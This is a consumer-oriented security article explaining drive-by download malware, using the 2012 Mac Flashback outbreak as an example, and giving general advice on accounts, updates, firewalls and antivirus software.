Drive-By Downloads: How They Attack and How to Defend Yourself
Drive-by downloads are malicious pieces of software that are downloaded to a computer, tablet or smartphone when the user views a compromised Web page or an HTML-based email message that links to a website.
In many cases, the malware will be automatically installed on the system; in almost all cases, the user won't be aware of it.
The malware delivered by a drive-by download is usually classified as a Trojan horse, or Trojan for short, because it deceives the user about the nature of the website or email. In most cases involving compromised websites, the operator of the website has no idea his site is distributing malware.
Once installed, malware delivered by a drive-by download can do a number of different things: log keystrokes, scan the system for files of a personal nature, herd the system into a botnet of similarly compromised machines, infect the Web browser with a banking Trojan that hijacks online-banking sessions or install a "backdoor" that will let in even more malware.
Modern Web browsers such as Firefox and Google Chrome, as well as robust anti-virus software, will alert users when browsers visit websites known to be compromised or malicious. But many drive-by download links are well hidden and won't cause infected sites to appear on blacklists of compromised sites.
A real-world example
The Mac Flashback outbreak, which infected an estimated 600,000 Macs in March 2012, showed how successful drive-by downloads can be.
Malware writers began by creating a fake "toolkit" for WordPress-based blogs that tens of thousands of WordPress users installed, creating a "backdoor" that let the malware writers infect their blogs.
Browsers visiting those pages were redirected to malware sites, which tried to install a "downloader," the first part of the Flashback Trojan. If direct installation of the downloader without the knowledge of the user failed, another piece of malware used a more traditional technique: It asked the user for permission to install (fake) Apple software, which was in fact the downloader.
Once installed, the downloader would install more malware. One piece was a backdoor; another hijacked Web browsers to replace Web ads with ads controlled by the malware writers.
The Flashback outbreak was contained by Apple security updates in early April 2012, but in retrospect, the owners of those 600,000 infected Macs were lucky.
The backdoor didn't install anything except fake ads. It could have instead stolen the users' identities, emptied their bank accounts or used the infected machines to pump out spam and malware.
How to protect yourself
To avoid being infected by drive-by downloads, computer users need to do three things.
First, set up the user accounts so that all regular users have limited permissions and cannot modify applications or the operating system. Create a separate administrator account to be used only when installing, updating or deleting software. Do not use the administrator account to browse around the Web or read emails.
Second, set the computer so that operating-system updates are automatically installed, and turn on whatever firewalls are available. (If you have a wireless router, its firewall should also be activated.)
Third, install a robust anti-virus software product, set it to automatically update itself with the latest malware definitions, and make sure it performs regular full-system scans.
Many free anti-virus products are available, but the paid ones do a better job of protecting Web browsers and email clients from drive-by downloads.
Smartphone and tablet users need to take different precautions. Owners of Apple iOS devices such as the iPhone, iPad and iPod Touch should avoid "jailbreaking" their devices and should install Apple system updates.
Android owners, however, should never immediately install a system update that suddenly appears on their screen; instead, they should check the Google Mobile Blog to check whether it's legitimate. Installation of mobile security software is also essential for Android users.